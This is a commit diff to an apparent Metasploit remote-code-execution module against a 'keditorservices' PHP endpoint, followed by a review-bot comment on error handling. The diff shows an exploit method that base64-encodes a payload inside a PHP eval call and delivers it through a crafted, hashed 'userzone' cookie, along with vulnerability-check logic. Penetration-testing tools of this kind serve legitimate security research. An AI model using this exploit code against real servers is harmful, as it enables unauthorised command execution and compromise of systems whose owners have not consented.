Add entry_id verification; clean up http request calls

MS-2855/keylogger-mettle-extension
Robin Verton 2017-10-23 15:19:35 +02:00
parent 30a86a1204
commit 0ac7e0926c
1 changed files with 29 additions and 4 deletions


@ -74,7 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => { 'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}" 'Cookie' => "userzone=#{encoded}#{hash}"
} }
@ -85,12 +89,29 @@ class MetasploitModule < Msf::Exploit::Remote
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
elsif res && res.body.include?(r) elsif res && res.body.include?(r)
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
elsif not self.check_entryid()
print_error("Invalid ENTRYID")
Exploit::CheckCode::Safe
else else
print_warning("Did you use a valid entry_id?")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
end end
def check_entryid
entry_id = datastore['ENTRYID']
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
}
)
return res.body.include? entry_id
end
def exploit def exploit
entry_id = datastore['ENTRYID'] entry_id = datastore['ENTRYID']
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()" cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
@ -109,7 +130,11 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => { 'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}" 'Cookie' => "userzone=#{encoded}#{hash}"
} }
@ -118,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
if res and res.redirect? if res and res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}") print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
elsif res and res.code != 200 elsif res and res.code != 200
print_error("Unexpected response...") print_error('Unexpected response...')
else else
print_status("Output: #{res.body}") print_status("Output: #{res.body}")
end end
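Review bot: The new `check_entryid` calls `res.body` with no nil guard at `return res.body.include? entry_id`, so a timeout or refused connection raises NoMethodError inside `check`, whereas the neighbouring branches test `res &&` first. Add `return false unless res` before that line, and write the call as `res.body.include?(entry_id.to_s)`. In `check`, the `elsif not self.check_entryid()` branch returns `Exploit::CheckCode::Safe` even though an invalid ENTRYID means the vulnerable path was never exercised. `Exploit::CheckCode::Unknown` would keep the result from reading as a clean bill of health, and the condition reads better as `elsif !check_entryid`. The substring match also passes on any response that merely echoes the id, so a short comment on `check_entryid` stating what a valid-entry response is expected to contain would help. The bodies of `check` and `exploit` begin outside the visible hunks, so any earlier handling of a nil `res` is not visible here.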